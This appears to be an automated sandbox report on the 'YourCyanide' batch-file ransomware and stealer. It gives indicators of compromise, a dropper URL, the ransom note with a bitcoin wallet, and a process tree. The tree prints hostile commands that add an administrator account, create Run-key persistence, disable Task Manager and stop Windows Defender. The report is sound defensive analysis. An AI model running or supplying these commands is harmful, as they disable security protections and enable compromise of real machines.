1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62

Resubmissions

18-05-2022 00:35

220518-axmh5abbc9 10

18-05-2022 00:32

220518-avncmsbbb7 10

Analysis

max time kernel
97s
max time network
100s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
18-05-2022 00:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YourCyanide.cmd
Size

90KB
MD5

4cb725f17bec289507f9e8249c8ea80e
SHA1

a7034e84cb884bf90e61ce3b621424bec57334ae
SHA256

1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62
SHA512

776982eab99b1285c209b71e2fd39e2765e9ce392a6c310208e72157dab3895b0b5a7c8b63d72e69bc507c88faec90a2f8f57788873f1a617a2659e22d2b7288

Score

10^/10

evasion persistence ransomware spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe

Extracted

Path

C:\Users\Admin\Desktop\YcynNote.txt

Ransom Note

Q: What happened to my files? A: Oops your files have been encrypted by YourCyanide. Q: how can I get them back? A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf. Q: What happens if I dont pay A: You will never get your files back. Q: How can I contact you A: contact at yourcyanide.help@gmail.com ++++++++++++++++++++++++++++++++++++++++++++ 3397 Files have been encrypted

Emails

yourcyanide.help@gmail.com

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

24 3048 powershell.exe
34 3556 powershell.exe
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

GetToken.exe

pid process

648 GetToken.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
24	3048	powershell.exe
34	3556	powershell.exe

pid	process
648	GetToken.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	cmd.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_4350_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.cmd"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_4487_toolbar = "ycynlog.cmd"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Drops file in Windows directory 2 IoCs

Processes:

cmd.exe

description ioc process

File opened for modification C:\Windows\win.ini cmd.exe
File opened for modification C:\Windows\system.ini cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1436 taskkill.exe

description	ioc	process
File opened for modification	C:\Windows\win.ini	cmd.exe
File opened for modification	C:\Windows\system.ini	cmd.exe

pid	process
1436	taskkill.exe

Modifies registry class 2 IoCs

Processes:

cmd.exeShellExperienceHost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\MuiCache	ShellExperienceHost.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2312 reg.exe

pid	process
2312	reg.exe

NTFS ADS 4 IoCs

Processes:

cmd.execmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\%onRsx:~13	cmd.exe
File opened for modification	C:\Users\Admin\%RafEw:~4	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\%YTsAV:~24	cmd.exe
File opened for modification	C:\Users\Admin\%ONRsX:~13	cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 54 IoCs

Processes:

powershell.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exepowershell.exepowershell.exenetsh.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
636	powershell.exe
636	powershell.exe
636	powershell.exe
1796	tskill.exe
1796	tskill.exe
4624	tskill.exe
4624	tskill.exe
3564	tskill.exe
3564	tskill.exe
1620	tskill.exe
1620	tskill.exe
1784	tskill.exe
1784	tskill.exe
2616	tskill.exe
2616	tskill.exe
3376	tskill.exe
3376	tskill.exe
2124	tskill.exe
2124	tskill.exe
4932	tskill.exe
4932	tskill.exe
1516	tskill.exe
1516	tskill.exe
1880	tskill.exe
1880	tskill.exe
3104	tskill.exe
3104	tskill.exe
2428	tskill.exe
2428	tskill.exe
3048	powershell.exe
3048	powershell.exe
3048	powershell.exe
4960	powershell.exe
4960	powershell.exe
3676	netsh.exe
3676	netsh.exe
3436	powershell.exe
3436	powershell.exe
3676	netsh.exe
4960	powershell.exe
3436	powershell.exe
2216	powershell.exe
2216	powershell.exe
4960	powershell.exe
3676	netsh.exe
2216	powershell.exe
3436	powershell.exe
2216	powershell.exe
3024	powershell.exe
3024	powershell.exe
3024	powershell.exe
3556	powershell.exe
3556	powershell.exe
3556	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exetaskkill.exepowershell.exepowershell.exenetsh.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	1436	taskkill.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	3676	netsh.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	3556	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

ShellExperienceHost.exe

pid process

4636 ShellExperienceHost.exe
4636 ShellExperienceHost.exe

pid	process
4636	ShellExperienceHost.exe
4636	ShellExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exenet.execmd.execmd.exenet.exenet.exe

description	pid	process	target process
PID 4264 wrote to memory of 1144	4264	cmd.exe	attrib.exe
PID 4264 wrote to memory of 1144	4264	cmd.exe	attrib.exe
PID 4264 wrote to memory of 5060	4264	cmd.exe	rundll32.exe
PID 4264 wrote to memory of 5060	4264	cmd.exe	rundll32.exe
PID 4264 wrote to memory of 1732	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 1732	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 1480	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 1480	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 5004	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 5004	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 4832	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 4832	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 4796	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 4796	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 636	4264	cmd.exe	powershell.exe
PID 4264 wrote to memory of 636	4264	cmd.exe	powershell.exe
PID 4264 wrote to memory of 3324	4264	cmd.exe	net.exe
PID 4264 wrote to memory of 3324	4264	cmd.exe	net.exe
PID 3324 wrote to memory of 4980	3324	net.exe	net1.exe
PID 3324 wrote to memory of 4980	3324	net.exe	net1.exe
PID 4264 wrote to memory of 1960	4264	cmd.exe	reg.exe
PID 4264 wrote to memory of 1960	4264	cmd.exe	reg.exe
PID 4264 wrote to memory of 1588	4264	cmd.exe	reg.exe
PID 4264 wrote to memory of 1588	4264	cmd.exe	reg.exe
PID 4264 wrote to memory of 3764	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 3764	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 112	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 112	4264	cmd.exe	cmd.exe
PID 4264 wrote to memory of 4000	4264	cmd.exe	net.exe
PID 4264 wrote to memory of 4000	4264	cmd.exe	net.exe
PID 4000 wrote to memory of 2284	4000	net.exe	net1.exe
PID 4000 wrote to memory of 2284	4000	net.exe	net1.exe
PID 3764 wrote to memory of 3656	3764	cmd.exe	scrnsave.scr
PID 3764 wrote to memory of 3656	3764	cmd.exe	scrnsave.scr
PID 112 wrote to memory of 4784	112	cmd.exe	scrnsave.scr
PID 112 wrote to memory of 4784	112	cmd.exe	scrnsave.scr
PID 3764 wrote to memory of 1812	3764	cmd.exe	scrnsave.scr
PID 3764 wrote to memory of 1812	3764	cmd.exe	scrnsave.scr
PID 112 wrote to memory of 3732	112	cmd.exe	scrnsave.scr
PID 112 wrote to memory of 3732	112	cmd.exe	scrnsave.scr
PID 3764 wrote to memory of 4808	3764	cmd.exe	scrnsave.scr
PID 3764 wrote to memory of 4808	3764	cmd.exe	scrnsave.scr
PID 112 wrote to memory of 3496	112	cmd.exe	scrnsave.scr
PID 112 wrote to memory of 3496	112	cmd.exe	scrnsave.scr
PID 3764 wrote to memory of 764	3764	cmd.exe	scrnsave.scr
PID 3764 wrote to memory of 764	3764	cmd.exe	scrnsave.scr
PID 4264 wrote to memory of 1436	4264	cmd.exe	taskkill.exe
PID 4264 wrote to memory of 1436	4264	cmd.exe	taskkill.exe
PID 112 wrote to memory of 1440	112	cmd.exe	scrnsave.scr
PID 112 wrote to memory of 1440	112	cmd.exe	scrnsave.scr
PID 3764 wrote to memory of 2216	3764	cmd.exe	scrnsave.scr
PID 3764 wrote to memory of 2216	3764	cmd.exe	scrnsave.scr
PID 112 wrote to memory of 2104	112	cmd.exe	scrnsave.scr
PID 112 wrote to memory of 2104	112	cmd.exe	scrnsave.scr
PID 4264 wrote to memory of 4052	4264	cmd.exe	net.exe
PID 4264 wrote to memory of 4052	4264	cmd.exe	net.exe
PID 3764 wrote to memory of 2584	3764	cmd.exe	scrnsave.scr
PID 3764 wrote to memory of 2584	3764	cmd.exe	scrnsave.scr
PID 4052 wrote to memory of 2924	4052	net.exe	net1.exe
PID 4052 wrote to memory of 2924	4052	net.exe	net1.exe
PID 4264 wrote to memory of 1368	4264	cmd.exe	net.exe
PID 4264 wrote to memory of 1368	4264	cmd.exe	net.exe
PID 1368 wrote to memory of 3348	1368	net.exe	net1.exe
PID 1368 wrote to memory of 3348	1368	net.exe	net1.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

1144 attrib.exe
2760 attrib.exe

pid	process
1144	attrib.exe
2760	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:4264

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd
2⤵
- Views/modifies file attributes
PID:1144

C:\Windows\system32\rundll32.exe
RUNDLL32 USER32.DLL SwapMouseButton
2⤵
PID:5060

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1732

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1480

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5004

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:4832

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:4796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
3⤵
PID:4980

C:\Windows\system32\reg.exe
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_4350_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd /f
2⤵
- Adds Run key to start application
PID:1960

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
2⤵
PID:1588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K black.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:3764

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3656

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1812

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4808

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:764

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2216

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2584

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1100

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4140

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4228

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2880

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3120

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4324

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2156

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2020

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4964

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1532

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3664

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3520

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1440

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2104

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:768

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2384

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4304

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:5100

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4824

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4324

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4816

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1880

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1960

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2428

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3688

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:380

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2356

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3228

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4624

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3704

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3844

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:5048

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4288

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3376

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4824

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1428

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1084

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3124

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2452

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4208

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4220

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2840

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3732

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4944

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1088

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3176

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:720

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1608

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2924

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3340

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1784

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2488

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4988

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3092

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2272

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3556

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3176

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2148

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4024

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3704

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2632

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4304

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4204

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3996

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3124

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:5024

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3728

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3520

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4336

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K black.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:112

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4784

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3732

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3496

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1440

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2104

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3848

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4708

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3840

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4304

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2488

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1932

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2212

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1144

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3912

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2288

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2428

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3380

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2128

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4024

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1368

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2004

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:60

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4676

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1572

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4720

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3224

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:872

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3640

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2552

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2000

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4000

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3568

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2924

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4036

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3836

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3840

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3564

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1860

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4204

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2220

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1708

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:64

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1204

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1912

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:636

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2224

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3980

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:224

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4936

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2284

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4332

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:764

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2388

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2356

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3988

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3992

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3172

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3376

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2652

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1656

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2744

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3504

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1436

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4412

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4052

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4036

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3048

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4064

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:5112

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1668

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:796

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3892

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1512

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:512

C:\Windows\system32\net.exe
net stop "WinDefend"
2⤵
- Suspicious use of WriteProcessMemory
PID:4000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
3⤵
PID:2284

C:\Windows\system32\taskkill.exe
taskkill /f /t /im "MSASCui.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Windows\system32\net.exe
net stop "wuauserv"
2⤵
- Suspicious use of WriteProcessMemory
PID:4052

